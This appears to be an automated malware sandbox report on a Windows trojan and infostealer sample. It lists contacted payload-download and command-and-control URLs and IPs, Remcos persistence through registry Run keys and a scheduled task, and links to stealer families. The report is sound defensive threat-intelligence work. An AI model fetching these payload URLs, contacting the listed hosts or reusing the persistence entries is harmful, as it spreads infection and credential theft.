https://founpiuer.store/apider	ed55d3f620.exe, 0000001E.00000003.2714804318.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739303850.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2766842170.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739915074.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2867187034.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl	ed55d3f620.exe, 0000001A.00000002.2854365732.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2754049186.0000000001003000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740115306.0000000001000000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739303850.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740190223.0000000001007000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739915074.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2754276104.000000000100B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	ed55d3f620.exe, 0000001A.00000003.2534263654.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669560404.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669405621.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669441404.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/mine/random.exeb	file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/mine/random.exei	file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Java	file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://51.159.4.50:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exe	ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	buildd.exe, 0000000E.00000002.2504854833.000001DBB8A01000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554628898.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683655971.0000000005612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.phptf	file.exe, 00000000.00000002.2007571138.0000000023943000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/a	ed55d3f620.exe, 0000001A.00000003.2781997932.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.217.98.121:80	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.rs/getrandom#nodejs-es-module-support	file.exe, file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpG	skotes.exe, 0000000B.00000002.2929148209.000000000154B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exes	ed55d3f620.exe, 0000001A.00000002.2847893858.00000000003FA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/746f34465cf17784/msvcp140.dll9	file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.124.221.201:8080/sendData	buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/RRC:	c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	ed55d3f620.exe, 0000001E.00000003.2716518989.0000000005939000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpncodedP	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://8.216.92.21:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.96.78.224:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpesf	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2611348298.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	false		high
https://154.9.207.142:443	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://founpiuer.store/vo	ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpncodedz	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/	ed55d3f620.exe, 0000001A.00000003.2782263726.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://38.60.191.38:80	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://132.145.17.167:9090	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://founpiuer.store/	ed55d3f620.exe, 0000001A.00000003.2658375154.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2700117064.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2700281753.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784614993.0000000001002000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740036344.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2716445296.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739397365.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2753600795.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2867187034.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206s4adf523b719729.phpion:	file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	false		high
https://founpiuer.store/pi	ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://founpiuer.store:443/api	ed55d3f620.exe, 0000001A.00000003.2676616593.000000000080E000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/remcos_a.exe	skotes.exe, 0000000B.00000002.2929148209.000000000159F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://192.99.196.191:443	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.78	play.google.com	United States	15169	GOOGLEUS	false
194.59.31.120	dpdnow.duckdns.org	Germany	30823	COMBAHTONcombahtonGmbHDE	true
104.21.5.155	founpiuer.store	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
147.124.221.201	unknown	United States	1432	AC-AS-1US	true
216.58.206.46	plus.l.google.com	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550706
Start date and time:	2024-11-07 04:11:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@62/55@19/14
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.99, 172.217.18.14, 74.125.133.84, 34.104.35.123, 142.250.186.35, 142.250.186.138, 142.250.184.234, 142.250.185.106, 172.217.18.10, 142.250.185.170, 142.250.186.74, 172.217.23.106, 142.250.185.138, 216.58.206.74, 216.58.212.170, 142.250.186.106, 172.217.16.202, 142.250.185.202, 216.58.212.138, 142.250.185.74, 216.58.206.42, 87.248.205.0, 192.229.221.95
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, clients.l.google.com, www.gstatic.com
Execution Graph export aborted for target file.exe, PID 6816 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:12:30	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
03:13:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ "C:\ProgramData\Remcos\remcos.exe"
03:13:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ed55d3f620.exe C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe
03:13:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c2a8de8bf3.exe C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe
03:13:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 315ef68721.exe C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe
03:13:51	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ "C:\ProgramData\Remcos\remcos.exe"
03:13:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-A34JIZ "C:\ProgramData\Remcos\remcos.exe"
03:14:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ed55d3f620.exe C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe
22:12:26	API Interceptor	16x Sleep call for process: file.exe modified
22:13:02	API Interceptor	885x Sleep call for process: skotes.exe modified
22:13:18	API Interceptor	11x Sleep call for process: buildd.exe modified
22:13:23	API Interceptor	32x Sleep call for process: ed55d3f620.exe modified
22:13:46	API Interceptor	125x Sleep call for process: remcos.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
194.59.31.120	file.exe	Get hash	malicious	Remcos	Browse
194.59.31.120	file.exe	Get hash	malicious	Remcos	Browse
104.21.5.155	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse	208.95.112.1
	4tuMnSBgXFwIxMP.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	20092837.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	dg4Bwri6Cy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHOYXfCAeB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	tfz7ikR76n.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RgAm3scap8.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	aviso de transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
founpiuer.store	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.5.155
dpdnow.duckdns.org	file.exe	Get hash	malicious	Remcos	Browse	194.59.31.120
dpdnow.duckdns.org	file.exe	Get hash	malicious	Remcos	Browse	194.59.31.120

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	Hesap.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	https://sites.google.com/view/mygov08/home	Get hash	malicious	Unknown	Browse	1.1.1.1
	505TW85087.htm	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	https://zip-store.oss-ap-southeast-1.aliyuncs.com/updated%20file/getup.txt	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://zip-store.oss-ap-southeast-1.aliyuncs.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	1.1.1.1
	SecuriteInfo.com.Win32.Evo-gen.14915.21522.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
COMBAHTONcombahtonGmbHDE	file.exe	Get hash	malicious	Remcos	Browse	194.59.31.120
	file.exe	Get hash	malicious	Remcos	Browse	194.59.31.120
	HblBI6P3wC.exe	Get hash	malicious	AsyncRAT	Browse	194.59.31.47
	rjjixABXe3.exe	Get hash	malicious	AsyncRAT	Browse	194.59.31.47
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	194.59.30.85
	Chronopost_FormulaireAdresse.vbs	Get hash	malicious	AsyncRAT	Browse	194.59.30.117
	Pq9gUej2pX.exe	Get hash	malicious	PureLog Stealer	Browse	185.234.72.78
	extukGiBrn.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.31.199
	Vh0tTzx4Ko.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.31.199
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	505TW85087.htm	Get hash	malicious	Unknown	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	g7TubE2bYo.exe	Get hash	malicious	Stealc, Vidar	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	https://fr1.readytocheckline.com/ykDZbM	Get hash	malicious	Unknown	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	https://fr2.readytocheckline.com/t2kf4F?ds=https://www.msnoob.com	Get hash	malicious	Unknown	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	http://roundcuve.vercel.app/	Get hash	malicious	Unknown	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	issa.orgListen-Now10098.html	Get hash	malicious	Unknown	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=%5B%5Brandom_string%28%29%5D%5DFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/7z0i5#d2poYW5AaGRlbC5jby5rcg==	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	184.28.90.27 13.107.246.45 20.12.23.50
	https://pmii-raise.com/pmii/uploads/wo/iot-01-2024-00067/pbcmc.php?7096797967704b5369323074665054436f75546b784e4c69334b4c4b6c4d3161744b3145764f7a3957336a49784d31416341https://ibssaecuritye.za.com/9YYa/#X%5Bemail%5D	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 13.107.246.45 20.12.23.50
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	SecuriteInfo.com.Win32.Evo-gen.14915.21522.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	file.exe	Get hash	malicious	Unknown	Browse	104.21.5.155

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Remcos\remcos.exe	file.exe	Get hash	malicious	Remcos	Browse
C:\ProgramData\chrome.dll	g7TubE2bYo.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
